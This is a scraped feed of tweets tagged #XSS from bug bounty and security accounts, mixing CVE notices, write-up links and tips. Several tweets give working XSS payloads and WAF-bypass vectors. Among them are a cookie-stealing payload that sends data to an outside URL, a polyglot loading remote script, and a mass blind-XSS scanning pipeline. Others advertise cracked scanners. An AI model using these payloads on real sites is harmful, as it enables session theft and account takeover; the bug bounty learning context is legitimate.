@firfox20a year agoXSS Reflected Alert Using my iphone 😂 #BugBounty https://t.co/Zwc3ifMyCO
![profile](https://pbs.twimg.com/profile_images/1276069838868414466/zdQG4aPl_normal.jpg)
moSec
@moe1n1a year agoWappalyzer: it is angular with version x.y.z Me:👀 ➡️portswigger xss cheat sheet Boom: Waf blocked my payload😁 Me: there's other subdomains with same stack🤓 Mission success 💯 #bugbountytips https://t.co/vnqxp2xnp0
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Invicti Professional Edition 23.4.0.40376 Full Activated – Discount 100% https://t.co/Joixus9aMb Link: https://t.co/gBrFhDHKls #HackerOne #infosec #Synack #bugcrowd #bugbountytips #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #BugHunter https://t.co/KcqVOX0lGA
![profile](https://pbs.twimg.com/profile_images/1638086490629586945/0XoF8_cS_normal.jpg)
Tarek
@DeanOfCybera year agoHere are my top 10 ways to make $10k #BugBounty in 10mins 🧵👇 Just kidding. If you're into bb read this. As a self identifying old-timer, I can confirm that after a number of years, finding your 100th XSS loses its glamor https://t.co/lu2xjvbjIm
![profile](https://pbs.twimg.com/profile_images/1618236159120871425/WV8sws8U_normal.jpg)
حسین گلزاری
@Hossein_golzaria year agoGuys, be sure to read Arman's write-ups. Last night I landed an XSS in one of the HackerOne programs with his latest write-up @M7arm4n https://t.co/CgGOvpCrNV
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoJSP ContextPath Link Manipulation http://target/&sol;EvilDomain/xss.js&num;/..;/..;/contextPathExample/test.jsp #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1570858647449899008/Hryn4TYZ_normal.jpg)
Rounak Premchandani
@RDX131106a year ago@TCMSecurity Is it necessary to first learn or the vulnerabilities to get into web app hacking and bug bounty ? Or is it possible to just start with one, for example XSS, and then try it on VDPs then get into perfecting it and then after all move to another ? Like SQL injection?
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoStored DOM XSS https://t.co/q3XVtc8c3l #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoiOS Bug Hunting – Web View XSS – https://t.co/TL7LrxK5ZM https://t.co/s3oKPMsX72 #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year ago$600 Cross Site Scripting (XSS) PoC https://t.co/q0YQhvsFUa #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year ago$150 Cross Site Scripting (XSS) PoC https://t.co/XP7vbbcqvB #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1176895564799082496/TKaVj6Hh_normal.jpg)
Stealthy
@stealthybugsa year agoInteresting XSS with random tag and zero special characters. <java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1) #xss #bugbounty #bugbountytips #hackerone #infosec #xsspayloads #hacking #ethicalhacking #infosec #whitehat
![profile](https://pbs.twimg.com/profile_images/1530252811270860805/InfTRtf-_normal.jpg)
Batuhan Aydın
@Telumaka year agoYou can read my article📝 titled 🧐 "XSS Understanding the Nature" where I talk about the nature of XSS and the ways to research them. Happy reading everyone. 😊 #creativity #technology #python #cybersecurity #security #xss #bugbounty #DEVCommunity https://t.co/SUCpDGCdH6
![profile](https://pbs.twimg.com/profile_images/1615460883324362752/G_qA5Whs_normal.jpg)
Greed
@0xGreed_a year agoManaged to bypass Cloudflare protection to trigger an XSS on a target using such a payload <svg/on/onload=alert(document.domain)> It was inspired by @aufzayed and found here https://t.co/9CYvEP8lnZ #bugbountytips #bugbounty #intigriti
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoStored DOM XSS by: 45w1nkv https://t.co/HvpvjJN50R #bugbounty #WriteUps
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agohack_git has lots of XSS Vectors/Payloads 🕵️♂️🔎 from resources like websites, tweets & books 📚 to bypass WAF & find XSS vulnerabilities 👩💻👨💻. Check out the list & stay updated for new ones 🗃️🔄 #XSS #Hacking #WAF #Vulnerability #CyberSecurity
![profile](https://pbs.twimg.com/profile_images/1301206555338051584/nUAnAMr9_normal.jpg)
Hacking Articles
@hackinarticlesa year agoBurp Suite for Pentester: XSS Validator https://t.co/wPEbBctC9O #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty… https://t.co/qTBWJ5KE4d https://t.co/AzgoDMnsge
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs this code vulnerable to Reflected XSS? - Visit https://t.co/fGh38pqS7B for the answer. #xss #reflected_xss #infosec #code #softwaredevelopment
![profile](https://pbs.twimg.com/profile_images/1516519684685934600/V_n-TLei_normal.png)
HUNTER 🇺🇦
@SaFiSecua year agoI just published How I Earned $1000 in Just 5 Minutes On Medium & Youtube Check it Out https://t.co/WWrisblNyU https://t.co/6mHl58m56N #xss #googlexss #xssbypass #storedxss #Hacking #CyberAttack #Pentesting #Hacked
![profile](https://pbs.twimg.com/profile_images/1589979416616005637/Yw2WPaLQ_normal.jpg)
pranav
@zerodaywo1fa year agoLevel up your #pentesting & streamline your life, #BugBounty hunters 🎯: 🔸Burp Suite > Proxy > Settings 🔸Match & Replace > Add Match: xss1 Replace: <script>alert(document.cookie)</script> Comment: XSS 1 Type 'xss1' & let #Burp swap it with your JS payload! 🚀 #bugbountytips https://t.co/q4vFU1t62E
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year ago#BXSS subfinder -d https://t.co/ndhz4PcZUc | gau | grep "&" | bxss -appendMode -payload '"><script src=https://t.co/Hiuf81Ha6G></script>' -parameters #cybersecuritytips #bugbountytips #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year agoXSSpear v1.0 a powerful single target URL rXSS scanner try it now! http://18.209.60.172:8080/ #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1516519684685934600/V_n-TLei_normal.png)
HUNTER 🇺🇦
@SaFiSecua year agohttps://t.co/LTlnfMkPvl #xss #idor #rce #BugBounty #hacker #Reconquete #payload @SimplyBookMe #bugbountystealer
![profile](https://pbs.twimg.com/profile_images/1548889702572429314/9fWrKfah_normal.jpg)
Kali Nathalie 🏳️⚧️
@K4L1_FSa year ago[Infosec] Finally, my God, my first XSS (stored, by the way) in a real (non-CTF) application with an unbearable WAF. 😭🎉😭🎉😭🎉😭🎉 WAF bypass with an HTML5 tag https://t.co/NFDhqxWphq
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxseca year ago8 Linux distros have released advisories for high-severity kernel bugs, including an actively exploited use after free vuln🪲‼️ Learn how to secure against these flaws that could lead to crashes, the exposure of sensitive info & more👇 https://t.co/HIQgE2IDQi #linux #infosec
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoBugCrowd Bug Bounty Disclosure: - Clickjacking with reflected xss and redirected to google - By Orange_hacker - https://t.co/U1evawvwOS #BugCrowd #BugBounty #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1490160598449012745/wqOKJQQE_normal.jpg)
Avoid The Hack!
@avoidthehacka year agoCISA Adds One Known Exploited #Vulnerability to Catalog CVE-2022-27926 - Zimbra Collaboration (ZCS) XSS Resolution is to... update! #exploits #cybersecurity #infosec #security https://t.co/DwqrucRP7A
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBlind XSS via SMS Support Chat — $1100 Bug Bounty! https://t.co/boZE958dZx #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1467327353277739009/tQXjVxuA_normal.jpg)
ASWIN K V
@deep_marketer_a year agoCan you trigger the xss? #bugbountytips #bugbountytip #BugBounty #infosec #CTF #Vulnerability #Hacking #DOMXSS #cybersecuritytips #xss #DOGE @theXSSrat @XssHunter https://t.co/BOTud10xNU
![profile](https://pbs.twimg.com/profile_images/1286430390220140548/vBKoN9WV_normal.jpg)
khadir Ha
@Nihilisme10a year agoXSS without HTML: Client-Side Template Injection with AngularJS https://t.co/gEsLFRo7Ua #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #Hacked — Ninad Mishra (@NinadMishra5) Apr 3, 2023 XSS without HTML: Client-Side Template Injection with AngularJS …
![profile](https://pbs.twimg.com/profile_images/1627307157371686912/OKDwF0gl_normal.jpg)
Abdelrhman Allam
@sl4x0a year agoRXSS via CVE-2021-20323 Template: https://t.co/M6al3Bm3dS #bugbounty #xss https://t.co/vYUQ8qmgcS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs converting `<` to `&lt;` sufficient to prevent execution of JavaScript from arbitrary HTML? - Visit https://t.co/kxrX3AaGyd for the answer. #xss #javascript #html #infosec #devlife
![profile](https://pbs.twimg.com/profile_images/1605805562704248832/SSwYApf2_normal.png)
Briskinfosec Technology and Consulting Pvt Ltd
@briskinfoseca year agoIs your #WordPress site using the #Lightspeed caching #plugin? Be aware of #security #vulnerabilities such as #XSS, #SQL injection, and privilege escalation that could compromise your #website's security. 🔗https://t.co/jGBOGHdqmI #dataprotection #DataBreach #websecurity #infosec https://t.co/pmFwTEnfCV
![profile](https://pbs.twimg.com/profile_images/1521731885742895104/O98spZI4_normal.jpg)
Alnoor Faisal
@tashwish01a year agoBlind Xss 🔥 https://t.co/FIZihWtuZf #hackerone #bugbounty #infsec #blind #xss https://t.co/nohzG9JSF9
![profile](https://pbs.twimg.com/profile_images/1388167436843819008/t2bYbDXU_normal.jpg)
adametim
@hacking4every1a year agoDay 22 of #100DaysOfHacking -revised some of my already obtained IT knowledge (XSS + LFI) -completed 5 tasks of AEC Hacking Competition 2023
![profile](https://pbs.twimg.com/profile_images/1104043057270403072/uC45Dbad_normal.png)
PenTest Magazine
@PenTestMaga year agoAppSec Tales XII! Read here: https://t.co/Nr2infVtbi #pentest #pentesting #magazine #pentestmag #cybersecurity #Infosec #owasp #redteam
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoBlind XSS via SMS Support Chat — $1100 Bug Bounty! by: no.pl4c3.l1k3.127.0.0.1 https://t.co/HJcRTlqvX1 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/TJw82KiDcb
![profile](https://pbs.twimg.com/profile_images/1634508098777018369/dGTtonKL_normal.jpg)
InfoSafeHub
@InfoSafeHuba year agoHello! I just wrote an article about automating XSS vulnerability hunting for mass cross-site scripting. You can check it out at:- https://t.co/GG8TwvPJBZ #bugbountytips #cybersecurity #hacking #ethicalhacking #websecurity
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year agoHello! I just wrote an article about automating XSS vulnerability hunting for mass cross-site scripting. You can check it out at https://t.co/xrcuSaiv3J #bugbountytips #cybersecurity #hacking #ethicalhacking #websecurity https://t.co/KNuEdpwW99
![profile](https://pbs.twimg.com/profile_images/1633705506077388802/LJxK90i0_normal.jpg)
Fat
@fattselimia year agoAnother one today this was for a Blind XSS and its a 7 months old report ^_^ #bugbounty #ethicalhacking #togetherwehitharder https://t.co/4QQ2Pvzj14
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs it possible to exploit unescaped user input into JavaScript form which only gets data via AJAX request? - Visit https://t.co/tHFv0xFnSO for the answer. #xss #infosec #software #softwareengineering #code
![profile](https://pbs.twimg.com/profile_images/1549096440038924289/S3YPC2Em_normal.jpg)
Chevon Phillip
@ChevonPhillipa year agoI just published Blind XSS via SMS Support Chat — $1100 Bug Bounty! https://t.co/cFlJrCHurg #bugbountytip #bugbounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1634508098777018369/dGTtonKL_normal.jpg)
InfoSafeHub
@InfoSafeHuba year agoFrom Basic to Advanced: A Guide to Bug Bounty Hunting Automation Techniques:- Checkout thread 👇 #bugbounty #bugbountytips #cybersecurity #ethicalhacking #vulnerability #websecurity #pentesting #automation #xss #oscommandinjection #subdomainenumeration #fuzzing #nuclei https://t.co/1UhW20pJ47
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS without HTML: Client-Side Template Injection with AngularJS https://t.co/sn45owMicz #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #Hacked
![profile](https://pbs.twimg.com/profile_images/1562167843788955649/WI1u3Re5_normal.jpg)
Deepak Choudhary
@CipherEraa year agoFile Upload Testing ( Method 5 ) => #WayToInject => Unrestricted File Upload Leads To Stored XSS. Poc: https://t.co/MLo6KAAm8y #CipherEra #VadixEra #AlphaEra #bugbounty #bugbountytips #offensivesecurity #webtesting #pentesting #fileupload #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoUploading images safe of XSS, php code and virus - Visit https://t.co/UIAX2l3qW8 for the solution. #php #xss #virus #file_upload #infosec
![profile](https://pbs.twimg.com/profile_images/1598478341471965186/FdWwRc5u_normal.jpg)
ravirajiq
@Ravirajiqa year agoI have found a xss bug 🤑. #BugBounty https://t.co/av0paJpiqW
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year agoFrom Basic to Advanced: A Guide to Bug Bounty Hunting Automation Techniques LINK : https://t.co/vqZR1RIG3H #bugbounty #bugbountytips #cybersecurity #ethicalhacking #vulnerability #websecurity #hackingtools #pentesting #automation #xss #oscommandinjection #subdomainenumeration https://t.co/sUokHuD8wz
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoExploiting Markdown Syntax and Telescope Persistent XSS through Markdown (CVE-2014-5144) https://t.co/mTYbqNLzqG #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoCache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover) https://t.co/09PLZSTp6h #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/u3iCLyraBb Stars: 855 Watching: 44 Last change: Apr 2, 2023 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1634259331003871233/l8MA2XPr_normal.jpg)
Saitle OP
@SaitleOa year agoDuck JS payload, kill js with your new xss power😉 https://t.co/h2wgbmTXiV #bugbountytips #wapt #Pentesting
![profile](https://pbs.twimg.com/profile_images/1642726840862408705/M81kFfQa_normal.jpg)
flyseccorp
@flysec_corpa year agoOur cases for bypass WAF (Imperva) - autofocus/onfocus=any() --> onfocus=;var{cookie}=document;write(cookie) - autofocus/onfocus - onfocus=any() --> onfocus=;write(cookie) - onfocus=any() --> onfocus=;Function(`ale`+`rt(domain)`)() #BypassWAF #XSS #Imperva #bugbounty https://t.co/qzin4p4Igx
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1760): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/w0FpZEJcPq Disclosed by https://t.co/6upkXZrCCJ, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1759): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/ixEya8G9Ed Disclosed by https://t.co/PLCH1wNNXA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1755): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/Rga9tnABOP Disclosed by https://t.co/6upkXZrCCJ, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1605882772287115264/_8lYQAAy_normal.jpg)
Hossein
@ho3ein_33a year ago@bughuntar @SaveToNotion #Thread #XSS #BugBounty
![profile](https://pbs.twimg.com/profile_images/1641429424640872449/n1H3FcaI_normal.jpg)
Hackers News
@HackersNews247a year agoThe Vulkan papers. 3CXDesktopApp incident. XSS flaw can lead to remote code execution. AlienFox targets misconfigured servers.. Hackers News https://t.co/VStfzexoIU #Hacking #Hacked#HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #newsUpdate #NewsUpdates
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@3XS0: #FREE 2ಠ23 ♥ HCL AppScan Standard v10.2.0.28254 Full Activated - CyberSecurity - Discount 100% https://t.co/BkoA2rOHgO Link : https://t.co/W3WEHRzxxD #HackerOne #inFoSec #bugbountytips #Log4j #BugBountyTip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #Log4j…
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ HCL AppScan Standard v10.2.0.28254 Full Activated - CyberSecurity - Discount 100% https://t.co/Joixus9aMb Link : https://t.co/IDF7EDWn0q #HackerOne #inFoSec #bugbountytips #Log4j #BugBountyTip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #Log4j2 #Hacker https://t.co/knzlo6vHUM
![profile](https://pbs.twimg.com/profile_images/1607516814069698562/t6lLZs90_normal.jpg)
The XSS Rat - 🇺🇦
@theXSSrata year agoStay up-to-date with the latest #cybersecurity news! Our Python script scrapes the latest articles from multiple websites and outputs them to an HTML file. Check it out on GitHub: https://t.co/6SRT0miKUd #infosec #python
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDOM Based XSS and Adding HTML Elements - Visit https://t.co/wa95mCIYvK for the solution. #xss #javascript #jquery #infosec #engineering
![profile](https://pbs.twimg.com/profile_images/1539876405231632384/3rdtEtLj_normal.jpg)
Red Hot Cyber
@redhotcybera year agoData of the Italian company Alpi Aviation for sale on the underground forum XSS #redhotcyber #informationsecurity #ethicalhacking #dataprotection #hacking #cybersecurity #cybercrime #cybersecuritytraining #cybersecuritynews #privacy #infosecurity https://t.co/0xIeBfC441
![profile](https://pbs.twimg.com/profile_images/1634259331003871233/l8MA2XPr_normal.jpg)
Saitle OP
@SaitleOa year agoFound an XSS without much impact, cmon escalate it heres a resource to help you https://t.co/KAoFXcFOCi #bugbountytips #redteaming #Pentesting
![profile](https://pbs.twimg.com/profile_images/1292087396972900357/pm1H2nwZ_normal.jpg)
Jeetendra Joshi
@SH3lLH4CK3Ra year ago@xer0dayz Is it possible to get RCE or SQL Injection using angular template injection like {{7*7}} ???? #bugbountytips #xss #sqli #hacker #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover) 👨💻 @bxmbn ➟ Expedia Group Bug Bounty 🟥 High 💰 $750.0 https://t.co/ByN8bqdun6 #bugbounty #bugbountytips #cybersecurity https://t.co/DYYmnooTK7
![profile](https://pbs.twimg.com/profile_images/1448391370419310592/yUpmTDis_normal.jpg)
yappare
@yapparea year agoWhen looking for bypass techniques in XSS/SQLi, my main reference is always https://t.co/6Oz09YCylo and https://t.co/86avErGjVn forums. But both are no longer accessible, but thanks to the Wayback machine. Here's an example https://t.co/ZVfEjX1EaJ . #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS Hunter #BugBounty #bugbountytips https://t.co/Is0rjcj7XS
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@flightrising: ⚠️Summary: Emergency Maintenance ⚠️ On the #FlightRising website, we have posted our final update and summary on the attempted XSS attack on Friday, March 31, 2023. (1/2) #NotAprilFools #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoXSS polyglot ⚡️ '"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT> #infosec
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1704): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/rplNwVt7OG Disclosed by https://t.co/5npLBWBmoO, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1703): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/DgUYi0RXth Disclosed by https://t.co/5npLBWBmoO, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1702): Cross-site Scripting (XSS) - Generic in pimcore/pimcore. https://t.co/9whdkTz8ni Disclosed by https://t.co/eC26LfjqRN, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1701): Cross-site Scripting (XSS) - Reflected in pimcore/pimcore. https://t.co/AvZZTzbxwk Disclosed by https://t.co/eC26LfjqRN, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoSuper FabriXss: From XSS to an RCE in Azure Service Fabric Explorer by #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS Filter Evasion Cheat Sheet #BugBounty #bugbountytips https://t.co/YOgJQWBy0C
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → javascript:alert(document.cookie) The best choice is : → data:text/html;base64,PHNjcmlwdDShbGVydCgnWENTJyk8L3NjcmiwdD4= #xss #hackerone #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → <img src=x onerror=alert(1);> The best choice is : → <svg/onload=alert(1)> → <video src=x onerror=alert(1);> → <audio src=x onerror=alert(1);> #hackerone #XSS #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoInstead of using : → alert(document.cookie) The best choice is : → with(document)alert(cookie) → alert(document['cookie']) → alert(document[/cookie/.source]) → alert (document[/coo/.source+/kie/.source]) #XSS #hackerone #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1175720140652105728/h0OTsCbh_normal.jpg)
Sahnoun.oussama
@Sahnounoussama5a year agoCross-Site Scripting Instead of using : → alert('xss') → alert(1) The best choice is : → prompt('xss') → prompt(8) → confirm('xss') → confrim(8) → alert(/xss/.source) → window[/alert/.source](8) #xss #BugBounty #bugbountytips #hackerone
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoUber Bug Bounty: Turning Self-XSS into Good-XSS #bugbountytips #bugbounty https://t.co/SY5DuDdIDt
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year ago[webapps] Reprise Software RLM v14.2BL4 – Cross-Site Scripting (XSS) #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year ago[webapps] ELSI Smart Floor V3.3.3 – Stored Cross-Site Scripting (XSS) #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1247156745975160832/brE_ipvp_normal.jpg)
twelvesec
@twelveseca year ago#Microsoft #patches a dangerous #RCE flaw found in the #Azure cloud service. #CyberSecurity #infosec https://t.co/B78iC6Ly6E https://t.co/AYXrcAxtJG
![profile](https://pbs.twimg.com/profile_images/1613784461208064000/-428GwOS_normal.jpg)
Dheeraj Yadav
@Dheerajydv19a year agoWays for Hacking Admin Panels #bugbountytips 1. Accessing admin panels using Github 2. Accessing admin panels using blind xss 3. Accessing admin panels using open ports 4. Accessing admin panels using forced browsing 5. Accessing admin panels by reading sources(JS)
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
Rachit
@iamR3KTa year agoOne of my p2 XSS got duplicated and original report was submitted just 30 mins back.😭 #pain in life #bugbounty #journey #cybersecurity #Hacking https://t.co/BSnI2B3CF3
![profile](https://pbs.twimg.com/profile_images/1642075745681014784/fb_n8jxa_normal.jpg)
Faisal Rathore
@AkaaZaana year agoXSS payload to steal cookies ⚡️🍪 "><script>document.write(%27<img%20src="https://t.co/KeCpWdLpzp…"%20/>%27);</script> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47438 (booking_calendar) Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in WpDevArt Booking calendar, Appointment Booking System plug ... https://t.co/4Xu5UjWDKB #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47596 (media_library_categories) Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Jeffrey-WP Media Library Categories plugin <= 1.9.9 vers ... https://t.co/WchwECqsut #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
